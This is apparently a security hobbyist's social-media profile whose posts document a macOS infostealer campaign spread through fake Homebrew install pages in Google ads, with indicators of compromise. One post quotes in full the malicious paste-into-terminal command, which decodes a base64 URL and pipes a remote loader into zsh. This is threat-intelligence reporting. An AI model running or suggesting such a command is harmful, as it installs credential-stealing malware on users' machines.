Developer at a cybersecurity startup.
Infosec hobyist, hope that one day I'll actually be able to contribute.
Rarely complete projects (ask me about my honeypot, or pippin)
| https://twitter.com/fauxeccles | |
| GH | https://github.com/faux-eccles |
| pronouns | he/him |
In case anyone was wondering, #mellowtel still seems to be processing requests. If it's still via the browser botnet still I'm not sure, but I assume so.
Some queries I've noted,
- circumventing query restrictions for searching government business dbs
- loading Instagram pages
- using the perplexity API for determing product recommendations for various questions
- performing Google searches and extracting the AI result
Seems like slab has been used a bit here and there for this campaign using various compromised ads accounts
https://adstransparency.google.com/?region=anywhere&platform=SEARCH&query=Homebrew+for+Mac&domain=slab.com
Huge amount of different ads accounts, all following similar approaches, oldest ad might be March 22nd
Interesting addendum about the advertiser https://adstransparency.google.com/advertiser/AR08935176312499208193?origin=ata®ion=anywhere
I suspect it could be compromised ads account, that being said I can't actually find this ad listed in the transparency page
A more sane and parseable list of indicators:
Landing page
httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7
Loaders
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
https://datasphere.us.com/debug/payload.applescript?build=492f9e58358e8e2bc9e0414fa077e197
Mocked User Agent for curls
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
APIs
httpX://datasphere.us[.]com/api/debug/event # initial info gathering
httpX://datasphere.us[.]com/gate # stealer upload location
httpX://datasphere.us[.]com/gate/chunk # large file uploads
httpX://datasphere.us[.]com/api/bot/heartbeat # Persistence heartbeat API
api key 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f
Absolute state of google, (and frankly the expectations of developers for installing things).
Setting up an older Mac to use as a new work machine, search google for brew Mac looking for the brew.sh site, first result is a sponsored link to httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.
First link is familiar install instructions as we're used to for brew "here copy paste this code into terminal, don't ask questions". * Don't actually do this *
echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh
Aww man that base64 makes me feel good and trusting, wonder what's inside
echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat
httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/
Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1
This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74
Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed
@SecurityWriter
The combat always feels so good, though as mostly glaive player there was less precision in my attacks, and mostly trying to pogo in the air for as long as possible.
Though with wilds I tried out longsword for the weebery and man some of the combos and setups just feels so good when you start learning the patterns
Are these panels recorded? This is definitely a talk that I'd find interesting for work.
I wonder how well these agentic crawlers manage phishing pages like this. Many have the ability to go "do their own research" on a particular topic, but if they're served with a page like this would they just follow the instructions in a best effort attempt and going it alone?
terms of service 